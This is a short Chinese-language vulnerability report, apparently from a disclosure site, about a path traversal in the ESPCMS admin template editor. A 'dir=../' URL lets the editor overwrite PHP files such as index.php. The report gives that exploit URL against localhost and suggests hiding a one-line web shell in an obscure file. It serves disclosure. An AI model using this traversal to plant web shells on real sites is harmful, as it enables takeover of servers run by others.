espcms后台getshell-1

### 简要描述： ### 详细说明： 修改模板处未限制路径，可以通过../修改template目录以外的php文件，写入一句话。 （此处为了方便演示，写入了首页，写入了phpinfo，实际情况可以在隐蔽的文件写入一句话） 正常的修改是这样的 [<img src="https://images.seebug.org/upload/201306/011045224c9eeb6b6c224c16124f34c32c040bf4.jpg" alt="www01.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201306/011045224c9eeb6b6c224c16124f34c32c040bf4.jpg) 接下来，构造url ``` http://127.0.0.1/espcms/adminsoft/index.php?archive=templatemain&action=templateedit&dir=../&filename=index.php&type=edit&freshid=0.41100375866517425&iframename=jerichotabiframe_0&iframeheightwindow=617&iframewidthwindow=1430 ``` 成功可以修改首页了 [<img src="https://images.seebug.org/upload/201306/0110460902b70bb97dcb770601ef212178b1249a.jpg" alt="www02.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201306/0110460902b70bb97dcb770601ef212178b1249a.jpg) 写进phpinfo [<img src="https://images.seebug.org/upload/201306/01104710f80bfdee5e98d592be88be79485259e6.jpg" alt="www03.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201306/01104710f80bfdee5e98d592be88be79485259e6.jpg) 成功 [<img src="https://images.seebug.org/upload/201306/011047258b0c9739cc86b081b455ce8ba7439362.jpg" alt="www04.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201306/011047258b0c9739cc86b081b455ce8ba7439362.jpg) 看看首页？ [<img src="https://images.seebug.org/upload/201306/01104747272113a8448b73adf77dae955ebda565.jpg" alt="www05.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201306/01104747272113a8448b73adf77dae955ebda565.jpg) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201306/01104747272113a8448b73adf77dae955ebda565.jpg" alt="www05.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201306/01104747272113a8448b73adf77dae955ebda565.jpg)